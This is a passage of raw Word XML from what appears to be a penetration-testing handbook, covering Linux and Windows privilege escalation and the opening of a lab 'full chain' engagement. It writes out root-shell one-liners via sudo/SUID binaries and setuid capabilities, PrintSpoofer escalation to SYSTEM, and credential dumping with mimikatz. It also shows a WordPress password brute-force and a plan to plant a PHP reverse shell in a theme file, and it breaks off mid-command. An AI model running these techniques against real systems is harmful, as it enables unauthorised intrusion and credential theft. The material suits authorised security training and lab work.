      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> rights, kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE725B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null              </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475F8BC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>getcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -r / 2&gt;/dev/null                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># capabilities (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cap_setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3F873" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/crontab; ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>cron.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># writable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF1770" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>ss -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>tulpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># local-only services (pivot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> hints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162FE5A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>rIl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 'password' /var/www /home /opt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4944B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>./linpeas.sh -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979D3AB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Common wins: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> \;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p \;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>capabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os;os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>")'</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">), writable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/PATH, creds reuse, kernel exploit (last resort).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BA1978" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6FDBF9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /groups &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D56AEF4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.\winPEASx64.exe  &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -ep bypass</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>; .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> .\PowerUp.ps1; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>AllChecks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0182BC22" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> qc &lt;service&gt; &amp; accesschk.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>uwcqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> "Everyone" &lt;service&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7810A3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C22FE1B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Common wins: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (service accounts) → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>PrintSpoofer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/Potato → SYSTEM (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PrintSpoofer.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unquoted service path</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> with a writable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>weak service perms</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (reconfigure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (malicious MSI); stored creds (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmdkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /list</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, unattend.xml, registry </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>AutoLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>). On domain members, SYSTEM/local-admin lets you dump creds (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) to feed lateral movement (§14).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B1C53" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="35A3B73A">
          <v:rect id="_x0000_i1208" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA7B6C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>21. Worked Engagement — Full Chain (web → double pivot → DC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DC987" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Illustrative end-to-end run tying the ranges together. Authorized/lab only. Placeholder IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B094470" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 1 — Edge recon (Web range).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> From ATTACKER </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.14.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">, scan the DMZ host </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D937B65" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p- --min-rate 2000 10.10.10.10 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> edge.txt      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># 80 HTTP, 22 SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF18B2A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> http://10.10.10.10                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067489F3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> http://10.10.10.10 --enumerate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>u,vp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FDCF1E4" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 2 — Foothold (web → shell).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> Weak </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp-admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> cred → theme editor → PHP web shell → reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A387DAA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> http://10.10.10.10 -U admin -P rockyou.txt          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0439A154" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 404.php with a PHP reverse shell; trigger it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EEBA54" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>curl "http://10.10.10.10/wp-content/themes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
